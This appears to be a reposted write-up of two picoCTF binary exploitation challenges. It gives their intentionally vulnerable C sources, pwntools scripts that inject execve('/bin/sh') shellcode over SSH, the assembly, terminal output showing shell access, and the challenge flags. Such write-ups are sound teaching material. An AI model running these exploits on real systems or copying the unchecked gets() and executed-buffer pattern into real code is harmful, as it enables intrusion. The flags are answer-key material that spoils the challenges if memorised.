shellcode的一个demo例子
一个 例子 Demo shellcode
2023-09-14 09:11:49 时间
handy-shellcode
Binary Exploitation, 50 points
Description:
This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
    /* Read one line from stdin into buf and echo it back.
     * gets() takes no length argument, so nothing here bounds the write:
     * any line longer than the caller's buffer overruns the stack. A
     * hardened build would use fgets(buf, size, stdin) with the caller's
     * size passed in. */
    gets(buf);
    puts(buf);
}
int main(int argc, char **argv){
    /* Unbuffered stdout so each prompt is flushed before stdin is read. */
    setvbuf(stdout, NULL, _IONBF, 0);
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    /* BUFSIZE (148) byte stack buffer that receives the user's input. */
    char buf[BUFSIZE];
    puts("Enter your shellcode:");
    /* vuln() fills buf with gets(), which never checks BUFSIZE. */
    vuln(buf);
    puts("Thanks! Executing now...");
    /* The input bytes are reinterpreted as a function and called, i.e. data
     * on the stack is executed. That only works because the stack is mapped
     * executable (the checksec output in this writeup reports NX disabled and
     * RWX segments); with NX / W^X enforced this call would fault. The stack
     * canary that checksec also reports does not stop this path: it is only
     * checked at function return and this input never overflows buf. */
    ((void (*)())buf)();
    /* Reached only if the executed code returns to us. */
    puts("Finishing Executing Shellcode. Exiting now...");
    return 0;
}
Solution:
This challenge is similar to last year's shellcode. We'll use pwntools' "shellcode" module to generate a shellcode:
# First, generate a pwntools template using:
# pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX disabled
# PIE: No PIE (0x8048000)
# RWX: Has RWX segments
import os
# `shell`, `remote_path`, `start`, `shellcraft`, `log` and `asm` are provided by
# the pwntools template generated with the `pwn template` command above; they
# are not defined in this snippet.
if shell is not None:
    # Run from the challenge directory on the remote host (presumably where
    # flag.txt lives; the ls output below shows it there).
    shell.set_working_directory(os.path.dirname(remote_path))
io = start()
# pwntools' stock execve("/bin///sh") stub for the target architecture
# recorded in the header comments above (i386).
shellcode = shellcraft.sh()
log.info("Shellcode: \n{}".format(shellcode))
# The program copies the line into a stack buffer with gets() and then calls
# into it, so the assembled machine code is sent as the answer to the prompt.
io.sendlineafter("Enter your shellcode:", asm(shellcode))
io.interactive()
Output:
root@kali:/media/sf_CTFs/pico/handy-shellcode# python exploit.py
[*] '/media/sf_CTFs/pico/handy-shellcode/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Connecting to 2019shell1.picoctf.com on port 22: Done
[*] dvdalt@2019shell1.picoctf.com:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Opening new channel: 'pwd': Done
[+] Receiving all data: Done (13B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/tmp/tmp.AwgEXes6oj'
[+] Opening new channel: 'ln -s /home/dvdalt/* .': Done
[+] Receiving all data: Done (0B)
[*] Closed SSH channel with 2019shell1.picoctf.com
[*] Working directory: '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af'
[+] Starting remote process '/problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln' on 2019shell1.picoctf.com: pid 3301954
[*] Shellcode:
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
[*] Switching to interactive mode
jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt vuln vuln.c
$ $ cat flag.txt
picoCTF{h4ndY_d4ndY_sh311c0d3_5843b402}
shellcode
Binary Exploitation, 200 points
Description:
This program executes any input you give it. Can you get a shell?
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 148
#define FLAGSIZE 128
void vuln(char *buf){
    /* Read one line from stdin into buf and echo it back.
     * gets() has no length parameter, so the write into buf is unbounded:
     * input longer than the caller's buffer overruns the stack. A hardened
     * version would take the buffer size and call fgets(buf, size, stdin). */
    gets(buf);
    puts(buf);
}
int main(int argc, char **argv){
    /* Unbuffered stdout so the prompt is flushed before stdin is read. */
    setvbuf(stdout, NULL, _IONBF, 0);
    // Set the gid to the effective gid
    // this prevents /bin/sh from dropping the privileges
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    /* BUFSIZE (148) byte stack buffer that receives the user's input. */
    char buf[BUFSIZE];
    puts("Enter a string!");
    /* vuln() fills buf with gets(), which never checks BUFSIZE. */
    vuln(buf);
    puts("Thanks! Executing now...");
    /* The input is cast to a function pointer and called: bytes on the stack
     * are executed as code. This requires an executable stack, which the
     * checksec output in this writeup confirms (NX disabled, RWX segments);
     * with NX / W^X enforced the call would fault. The same output reports
     * no stack canary for this binary, and a canary would not help anyway
     * since this path executes buf without overflowing it. */
    ((void (*)())buf)();
    /* Reached only if the executed code returns. */
    return 0;
}
Solution:
We'll use pwntools' "shellcode" module to generate a shellcode:
from pwn import *
import argparse
import os
# Name of the challenge binary.
EXECUTABLE = "vuln"
# Directory used when running a local copy of the binary.
LOCAL_PATH = "./"
# Challenge directory on the picoCTF shell server (trailing slash matters:
# the path functions below concatenate EXECUTABLE directly onto it).
REMOTE_PATH = "/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/"
# Host used for the SSH session when --ssh_user is given.
SSH_SERVER = "2018shell3.picoctf.com"
def get_process_path(is_ssh = False):
    """Return the path of the challenge binary.

    The remote problem directory is used when an SSH session was requested
    or when that directory exists on the current machine; otherwise the
    local copy next to this script is used.
    """
    use_remote = is_ssh or os.path.exists(REMOTE_PATH)
    base_dir = REMOTE_PATH if use_remote else LOCAL_PATH
    return base_dir + EXECUTABLE
def get_process(ssh_user = None):
    """Start the challenge binary and return the pwntools tube for it.

    When ssh_user is given the binary is launched through an SSH session to
    SSH_SERVER; otherwise a local process is spawned. In both cases the
    process runs with the binary's own directory as its cwd.
    """
    via_ssh = ssh_user is not None
    path = get_process_path(via_ssh)
    launch_args = {"argv": path, "cwd": os.path.dirname(path)}
    if not via_ssh:
        return process(**launch_args)
    session = ssh(host=SSH_SERVER, user=ssh_user)
    return session.process(**launch_args)
# Command line: `-s USER` runs the target over SSH instead of locally.
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--ssh_user", help="Connect via SSH with the given username")
args = parser.parse_args()
# Point pwntools at the binary so asm() targets its architecture
# (i386 per the checksec output below).
context.binary = get_process_path()
p = get_process(args.ssh_user)
# pwntools' stock execve("/bin///sh") stub; its listing is printed in the output.
shellcode = shellcraft.sh()
print "Shellcode:"  # Python 2 print statements: this script does not run on Python 3
print shellcode
payload = asm(shellcode)
# The target copies the line into a stack buffer with gets() and then calls
# into it, so the assembled bytes are sent as the reply to the prompt.
p.sendlineafter("Enter a string!", payload)
p.interactive()
Output:
root@kali:/media/sf_CTFs/pico/shellcode# python exploit.py --ssh_user=$pico_ssh_user
[*] '/media/sf_CTFs/pico/shellcode/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Connecting to 2018shell3.picoctf.com on port 22: Done
[*] user@2018shell3.picoctf.com:
Distro Ubuntu 16.04
OS: linux
Arch: amd64
Version: 4.4.0
ASLR: Enabled
[+] Starting remote process '/problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed/vuln' on 2018shell3.picoctf.com: pid 94685
Shellcode:
/* execve(path='/bin///sh', argv=['sh'], envp=0) */
/* push '/bin///sh\x00' */
push 0x68
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp
/* push argument array ['sh\x00'] */
/* push 'sh\x00\x00' */
push 0x1010101
xor dword ptr [esp], 0x1016972
xor ecx, ecx
push ecx /* null terminate */
push 4
pop ecx
add ecx, esp
push ecx /* 'sh\x00' */
mov ecx, esp
xor edx, edx
/* call execve() */
push SYS_execve /* 0xb */
pop eax
int 0x80
[*] Switching to interactive mode
jhh///sh/bin\x89h����\x814$ri��1Qj\x04Y�Q1j\x0bX̀
Thanks! Executing now...
$ $ ls
flag.txt vuln vuln.c
$ $ cat flag.txt
picoCTF{shellc0de_w00h00_9ee0edd0}$ $ exit
[*] Got EOF while reading in interactive
$
[*] Stopped remote process 'vuln' on 2018shell3.picoctf.com (pid 94685)
[*] Got EOF while sending in interactive
The flag: picoCTF{shellc0de_w00h00_9ee0edd0}